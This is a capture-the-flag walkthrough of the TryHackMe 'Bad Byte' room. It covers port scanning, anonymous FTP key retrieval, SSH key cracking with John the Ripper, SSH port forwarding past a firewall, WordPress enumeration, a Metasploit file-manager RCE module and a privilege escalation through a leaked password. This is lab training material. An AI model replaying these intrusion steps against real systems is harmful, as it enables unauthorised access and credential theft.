Port forwarding is a networking technique that allows a user to access services on a computer or network behind a firewall or router. It opens up specific ports on a computer or network to allow external devices to connect and access services and applications on the internal network.
- Link: https://tryhackme.com/room/badbyte
- Difficulty: Easy
- Target: “user.txt”, “root.txt” on the targetIP
- Highlight: Using port forwarding to make an internal website accessible (i.e., hackable) outside the network.
- Tags: FTP, port forwarding
Let’s start by noting down our IP addresses and exporting them as variables in the terminal.
export targetIP=10.10.241.193 export myIP=10.6.2.23
Next, let’s run a standard Nmap scan. The
-vv flag indicates very verbose output.
┌─[kalisurfer@parrot]─[~] └──╼ $nmap -p- -vv 10.10.241.193 Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:24 EST Initiating Ping Scan at 14:24 Scanning 10.10.241.193 [2 ports] Completed Ping Scan at 14:24, 0.09s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 14:24 Completed Parallel DNS resolution of 1 host. at 14:24, 0.03s elapsed Initiating Connect Scan at 14:24 Scanning 10.10.241.193 [65535 ports] Discovered open port 22/tcp on 10.10.241.193 Increasing send delay for 10.10.241.193 from 0 to 5 due to 45 out of 149 dropped probes since last increase. Discovered open port 30024/tcp on 10.10.241.193
Now we’ll run another more targeted Nmap scan to drill in on the open ports.
┌─[kalisurfer@parrot]─[~] └──╼ $nmap -A -p 22,30024 10.10.241.193 Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:26 EST Nmap scan report for 10.10.241.193 Host is up (0.086s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA) | 256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA) |_ 256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519) 30024/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.6.2.23 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 ftp ftp 1743 Mar 23 2021 id_rsa |_-rw-r--r-- 1 ftp ftp 78 Mar 23 2021 note.txt Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds
Let’s focus first on the FTP service running on port
30024. It allows anonymous FTP login, so we should be able to view and copy the two files found in the directory.
We can log into the FTP service with the command:
lftp -p 30024 10.10.241.19
In the 2021
note.txt we find a clue mentioning a possible username:
CRACKING THE SSH PASSCODE WITH JOHN
Let’s first attempt to log in without knowing the password using the
id_rsa file as an ssh private key:
ssh -i id_rsa firstname.lastname@example.org
We get the following error:
Permissions 0644 for 'id_rsa' are too open.
To use this key, we need to set more restrictive permissions on the file. We’ll use the following command:
sudo chmod 600 id_rsa
The other thing we need to do is use John the ripper to crack the passkey for the encrypted ssh key file.
First, we’ll set up the hash in a format acceptable to John the Ripper using
ssh2john.py. My attack machine doesn’t have the program, so I grab it from this git repo and run it with the following command to save the hash in a new file.
python3 ssh2john.py id_rsa > hash
Next, we run John the Ripper on the hash with the simple command:
A few seconds later john finds a password match (
errorcauser:cupcake). Now we have everything we need to ssh into the target machine.
SETTING UP PORT FORWARDING
In this box, the target machine has a firewall set up to block public access to the website hosted on port
We can get around the firewall by setting up dynamic port forwarding. Let’s ssh into the target machine with the following command and our password (
sudo ssh -i id_rsa -D 1337 email@example.com
-D indicates dynamic port forwarding via an SSH tunnel on port 1337)
And we are in as user
Now we need to edit the proxychain file located at:
/etc/proxychains.conf according to instructions in the TryHackMe instructions for this box to set up
socks5 proxy on port 1337 for IP
Now let’s run an Nmap scan on the target machine via port forwarding with the command:
proxychains nmap -sT 127.0.0.1
-sT for TCP connect scan)
Next, we need to set up local port forwarding with the command:
sudo ssh -i id_rsa -L 80:127.0.0.1:80 firstname.lastname@example.org
And now that everything is set up for port forwarding, we can check to see if our browser can open the website at
Bingo! Port forwarding is now running as intended!
Walking the website reveals hints that it is a WordPress site. We can use a special Nmap script to specifically enumerate WordPress sites:
sudo nmap -sV --script http-wordpress-enum 127.0.0.1
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough] └──╼ $sudo nmap -sV --script http-wordpress-enum 127.0.0.1 [sudo] password for kalisurfer: Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 15:12 EST Nmap scan report for localhost (127.0.0.1) Host is up (0.0000060s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-wordpress-enum: | Search limited to top 100 themes/plugins | plugins |_ duplicator 1.3.26 |_http-server-header: Apache/2.4.29 (Ubuntu) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 5432/tcp open postgresql PostgreSQL DB 9.6.0 or later | fingerprint-strings: | SMBProgNeg: | SFATAL | VFATAL | C0A000 | Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0 | Fpostmaster.c | L2127 |_ RProcessStartupPacket 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port5432-TCP:V=7.92%I=7%D=12/30%Time=63AF464A%P=x86_64-pc-linux-gnu%r(S SF:MBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronte SF:nd\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x20 SF:3\.0\0Fpostmaster\.c\0L2127\0RProcessStartupPacket\0\0"); Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
Another option for WordPress enumeration is the classic command line tool:
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough] └──╼ $wpscan --url 127.0.0.1 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.21 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://127.0.0.1/ [127.0.0.1] [+] Started: Fri Dec 30 15:27:00 2022 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://127.0.0.1/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://127.0.0.1/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://127.0.0.1/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.7 identified (Insecure, released on 2021-03-09). | Found By: Emoji Settings (Passive Detection) | - http://127.0.0.1/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7' | Confirmed By: Meta Generator (Passive Detection) | - http://127.0.0.1/, Match: 'WordPress 5.7' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:03 <===============> (137 / 137) 100.00% Time: 00:00:03 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Fri Dec 30 15:27:10 2022 [+] Requests Done: 180 [+] Cached Requests: 4 [+] Data Sent: 41.932 KB [+] Data Received: 19.464 MB [+] Memory used: 239.887 MB [+] Elapsed time: 00:00:10
EXPLOITING WORDPRESS PLUGINS WITH METASPLOIT
Now it is time to fire up Metasploit and search for modules that target the two plugins found on the site: duplicator and file-manager.
The first module (
scanner/http/wp_duplicator_file_read) can retrieve a list of users and services running on the machine. We’ll save this for later in case it comes in handy.
The second module (
multi/http/wp_file_manager_rce) enables remote code execution. We will go forward with this attack vector to gain our initial foothold.
And we’ve now found our
user.txt file in user
cth’s home directory. Next, we will continue enumerating the machine for ways to escalate privileges.
bash.log file can be found and accessed by user
A misspelling of
cth caused him to accidentally type his previous password in cleartext (
G00dP@$sw0rd2020). Maybe the new one is
Let’s try it and, lo and behold, it works! I think it’s time for user
cth to get a completely new password, not just keep changing the end to the current year’s date!
ssh’ing in as
cth, we can search for
ssh in as email@example.com
And the final step is to cat out the
sudo cat /root/root.txt
Where To Next?
Among other tools, we used a port scanner in this tutorial. Want to dive deeper into security research? Read on here:
👉 Recommended Tutorial: Creating a Port Scanner with Python Networking Sockets
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.